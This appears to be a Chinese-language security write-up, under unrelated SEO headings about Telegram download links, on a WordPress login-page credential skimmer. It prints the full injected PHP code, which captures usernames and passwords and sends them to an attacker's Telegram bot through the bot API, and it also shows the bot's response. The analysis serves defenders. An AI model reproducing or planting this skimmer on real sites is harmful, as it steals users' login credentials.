纸飞机github（纸飞机 门户）

1.纸飞机网址链接流程

研究人员近期发现一项有趣的技术，该技术利用Telegram纸飞机API窃取数据，并将其以私人消息的形式发送给攻击者所控制的机器人研究人员发现攻击者在WordPress网站的wp-login.php页面中注入了以下恶意代码：。

2.纸飞机网站

$nan = $_POST@[log]; $pw = $_POST@[pwd]; $hus = $_SERVER[SERVER_NAME]; $loe = $_SERVER[REMOTE_ADDR]; $pu = date("d-m-Y H:i:s"); $fuki = " hus: $hus nan: $nan pw: $pw pu : $loe wate : $pu"; $fuki = wordwrap($fuki, 70); //$file = fopen("/home/REDACTED/domains/REDACTED.com/public_html/wp-content/a.txt", "a"); //fwrite($file, $fuki); file_get_contents("https://api.telegram[.]org/bot1305967562:AAHIKx1E24UCDxFG8wlStrj8qDWd3ZDaSDY/sendMessage?chat_id=1113291041&text=" . urlencode($fuki)); wp_redirect($redirect_to); exit;

3.纸飞机官网下载链接

通过将该恶意代码注入wp-login.php页面中，攻击者能够在用户执行登录操作时窃取其登录凭证从以上代码中可以看出，最初攻击者将窃取的数据写入名为“a.txt”的文件中但之后出于某种原因，攻击者对代码进行了修改，以向Telegram纸飞机的API发送请求，从而将数据以消息的形式发送给攻击者所控制的机器人。

4.纸飞机airtcp网址

攻击者使用file_get_contents函数向Telegram的API地址发出远程请求，从而传输窃取的数据，且不会在服务器上留下很多痕迹利用该方法攻击者可以实时访问被盗的数据，而无需检查文本文件中是否有任何捕获的信息。

5.纸飞机域名

攻击者发送的请求将检索以下JSON：{ "ok":true, "result":{ "message_id":80, "from":{ "id":1305967562, "is_bot":true, "first_name":"wp-login", "username":"wplogin90bot" }, "chat":{ "id":1113291041, "first_name":"hana", "last_name":"lon turi", "type":"private" }, "date":1602778337, "text":"STOLEN DATA GOES HERE" } }

6.纸飞机官方网站

从响应请求可以明显的看出，窃取的数据被传输到名为wplogin90bot的机器人，这是发送到该机器人的第80条请求我们可以假设攻击者已经通过这些请求成功发送了80条消息，其中的一些消息可能包含了从受感染网站窃取的数据信息。

7.纸飞机网页版

目前该代码似乎还在开发中，并添加了新功能来满足攻击者的要求。微信搜索SecTr安全团队进行关注，获取更多网络安全资讯！